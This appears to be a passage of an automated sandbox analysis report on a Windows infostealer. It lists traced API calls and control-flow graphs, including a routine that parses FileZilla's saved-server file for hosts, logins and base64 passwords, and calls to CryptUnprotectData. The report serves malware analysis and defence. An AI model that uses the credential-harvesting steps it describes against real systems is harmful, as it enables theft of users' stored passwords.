                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 362916592-0
                                                                                                                                                                                                                                      • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                      • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2068576380-0
                                                                                                                                                                                                                                      • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                      • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1206570057-0
                                                                                                                                                                                                                                      • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                      • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 752954902-0
                                                                                                                                                                                                                                      • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                      • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,040738A0), ref: 004072AB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 004072FB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 0040730F
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 00407322
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 00407336
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04073928), ref: 0040734A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 00407399
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 004073AD
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 004073C1
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 004073D4
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078050), ref: 004073E8
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 00407438
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 0040744B
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 0040745F
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 00407473
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,040780B8), ref: 00407486
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 004074D6
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 004074EA
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 004074FD
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 00407511
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078120), ref: 00407525
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 0040754D
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 00407574
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 00407588
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 0040759C
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 004075AF
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078188), ref: 004075C3
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076A68), ref: 00407613
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076BA0), ref: 00407626
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078238), ref: 0040763A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078328), ref: 0040764E
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 00407018
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020, : ), ref: 0040702A
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 0040705F
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 004070A3
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                        • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04070798), ref: 004077DB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,040774F0), ref: 004077EE
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(30A54020), ref: 004077FB
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(30A54020), ref: 0040780B
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3958002797-0
                                                                                                                                                                                                                                      • Opcode ID: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
                                                                                                                                                                                                                                      • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 217 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->217 227 40ebb2-40ebb6 217->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 230 40ec06-40ec17 StrStrA 229->230 231 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->231 234 40ec50-40ec61 StrStrA 230->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 230->235 231->230 237 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->237 238 40ec9a-40ecab StrStrA 234->238 235->234 237->238 244 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 238->244 245 40ed39-40ed4b call 4170d0 lstrlen 238->245 244->245 288 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 244->288 262 40ed51-40ed63 call 4170d0 lstrlen 245->262 263 40eeaf-40eec5 strtok_s 245->263 262->263 273 40ed69-40ed7b call 4170d0 lstrlen 262->273 263->227 273->263 283 40ed81-40ed93 call 4170d0 lstrlen 273->283 283->263 292 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->292 288->245 292->263
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                        • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                        • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                      • API String ID: 1266801029-555421843
                                                                                                                                                                                                                                      • Opcode ID: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
                                                                                                                                                                                                                                      • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 322 415ed0-415ee4 call 415dc0 325 416103-416162 LoadLibraryA * 5 322->325 326 415eea-4160fe call 415df0 GetProcAddress * 21 322->326 328 416164-416178 GetProcAddress 325->328 329 41617d-416184 325->329 326->325 328->329 331 4161b6-4161bd 329->331 332 416186-4161b1 GetProcAddress * 2 329->332 333 4161d8-4161df 331->333 334 4161bf-4161d3 GetProcAddress 331->334 332->331 335 4161e1-4161f4 GetProcAddress 333->335 336 4161f9-416200 333->336 334->333 335->336 337 416231-416232 336->337 338 416202-41622c GetProcAddress * 2 336->338 338->337
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04052928), ref: 00415F11
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04052958), ref: 00415F2A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040528F8), ref: 00415F42
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04052970), ref: 00415F5A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04052988), ref: 00415F73
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,0406DC80), ref: 00415F8B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054058), ref: 00415FA3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04053E98), ref: 00415FBC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070438), ref: 00415FD4
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070348), ref: 00415FEC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040704C8), ref: 00416005
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070228), ref: 0041601D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04053EB8), ref: 00416035
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040703D8), ref: 0041604E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040704E0), ref: 00416066
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040541B8), ref: 0041607E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070288), ref: 00416097
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040703F0), ref: 004160AF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04053F98), ref: 004160C7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070240), ref: 004160E0
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054098), ref: 004160F8
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04070450,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(040704F8,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04070408,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04070210,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04070378,?,004136C0), ref: 00416150
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,04070258), ref: 00416172
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,04070420), ref: 00416193
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,04070270), ref: 004161AB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04070300), ref: 004161CD
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,04054038), ref: 004161EE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(76E90000,0406DCA0), ref: 0041620F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
